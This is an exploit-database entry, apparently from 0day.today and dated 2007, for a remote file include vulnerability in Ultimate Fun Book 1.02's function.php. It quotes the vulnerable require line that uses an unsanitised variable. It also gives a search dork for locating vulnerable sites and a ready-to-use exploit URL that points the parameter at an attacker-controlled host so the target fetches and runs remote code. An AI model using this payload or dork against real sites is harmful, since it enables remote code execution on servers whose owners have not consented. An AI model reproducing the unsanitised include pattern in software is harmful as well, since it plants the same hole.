id: 1519
date: 02/20/2007
title: Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability
author: kezzap66345
cves: 

=======================================================================
Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability
=======================================================================



****Ultimate Fun Book 1.02****
**found by:kezzap66345
**contant= [:(]
**dork:Ultimate-Fun-Book 1.02

file:

function.php

code:

<?php
require($gbpfad."/config.php");

exploit:

http://target/path/function.php?gbpfad=http://evil[script]

*********thanx= x0r0n,str0ke,shakia***********
*****************************************




#  0day.today [2023-03-25]  #